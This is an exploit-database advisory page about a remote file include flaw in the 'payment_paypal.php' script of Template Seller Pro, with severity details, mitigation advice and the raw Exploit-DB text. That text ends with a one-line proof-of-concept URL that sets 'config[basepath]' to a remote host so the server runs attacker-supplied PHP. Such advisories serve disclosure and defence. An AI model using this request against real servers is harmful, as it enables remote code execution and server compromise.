header-logo
Suggest Exploit
vendor:
Template Seller Pro
by:
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Template Seller Pro
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote File Include Vulnerability in Template Seller Pro

The Template Seller Pro application is prone to a remote file include vulnerability. This vulnerability occurs due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this vulnerability by injecting a malicious URL in the 'config[basepath]' parameter of the 'payment_paypal.php' script. By including a remote file containing arbitrary PHP code, an attacker can execute arbitrary commands on the affected server with the privileges of the web server process. This could lead to unauthorized access and compromise of the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Template Seller Pro application to a version that properly sanitizes user input. Additionally, web application firewalls and input validation mechanisms can be implemented to filter out malicious input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15441/info

Template Seller Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://www.example.com/[CODE]?

Navigation

Suggest Exploit

Services By CQR